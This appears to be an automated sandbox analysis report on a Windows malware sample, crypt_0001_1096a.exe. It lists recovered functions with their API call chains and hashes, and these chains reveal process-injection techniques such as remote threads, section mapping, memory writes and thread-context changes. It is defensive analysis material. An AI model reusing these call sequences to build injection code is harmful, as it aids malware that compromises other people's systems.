    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypt_0001_1096a.exe Analysis ID: 64002

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
